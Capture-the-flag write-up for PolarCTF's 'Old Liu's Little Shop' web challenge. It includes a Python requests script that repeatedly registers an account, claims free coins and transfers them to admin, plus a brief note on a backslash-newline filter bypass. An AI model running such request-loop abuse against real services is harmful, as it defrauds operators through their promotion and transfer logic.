PolarCTF Web, Hard

老刘的小店 (Old Liu's Little Shop)

Open the challenge, find the registration page and register the account admin with the password 123456.

Once inside there is a "claim three coins" feature. Clicking it works, but you then have to wait 60 s before the next claim. I tried plenty of tricks here, tampering with the timestamp, changing the number of coins claimed and so on, but none of them did anything: the back end of this challenge is written very strictly. There is also a coin transfer feature, which suggests a plan: repeatedly register an account -> claim the coins -> transfer them to one account, until that account has enough.

Those three steps are three HTTP requests. Capture them in Burp, convert each with the "Copy as Python-Requests" extension, put the three pieces of code together and run them in a loop.
```python
import requests

BASE = "http://95b7e082-d1d5-4d95-a8e8-7e9ea3a441b5.www.polarctf.com:8090"

# Session cookie of the account logged in through the browser; every request below carries it.
cookies = {"PHPSESSID": "5j2nb9bgtmrrmj2jnm546q795b"}

# Headers copied from the Burp capture (identical for all three requests apart from Referer).
headers = {
    "Cache-Control": "max-age=0",
    "Accept-Language": "zh-CN,zh;q=0.9",
    "Origin": BASE,
    "Content-Type": "application/x-www-form-urlencoded",
    "Upgrade-Insecure-Requests": "1",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
    "Accept-Encoding": "gzip, deflate, br",
    "Connection": "keep-alive",
}

session = requests.session()

# 1. Register the throwaway account (the same name every time; see the note below about the cookie).
session.post(BASE + "/register.php", headers={**headers, "Referer": BASE + "/register.php"},
             cookies=cookies, data={"username": "abc", "password": "123456"})

# 2. Claim the free coins.
session.post(BASE + "/dashboard.php", headers={**headers, "Referer": BASE + "/dashboard.php"},
             cookies=cookies, data={"get_coins": ""})

# 3. Transfer them to admin.
session.post(BASE + "/dashboard.php", headers={**headers, "Referer": BASE + "/dashboard.php"},
             cookies=cookies, data={"transfer": "1", "to_user": "admin", "amount": "4"})
```
Run it once, refresh the page, and admin has four more coins.

Wrap it in a loop and you are done.

One thing worth noting: registering the same account by hand gives an error, but when the request carries the cookie the back end passes validation and performs the operation. If you are curious, try removing the cookie: the coin count then stops increasing.
After buying the item you get a username and password. Logging in with them shows a biography of 老刘, and the page source contains PHP code (shown as a screenshot in the original post).

The code does not filter backslashes, so a backslash followed by a newline bypasses the check directly.

Posted 2025-12-04 22:33 by CLAY666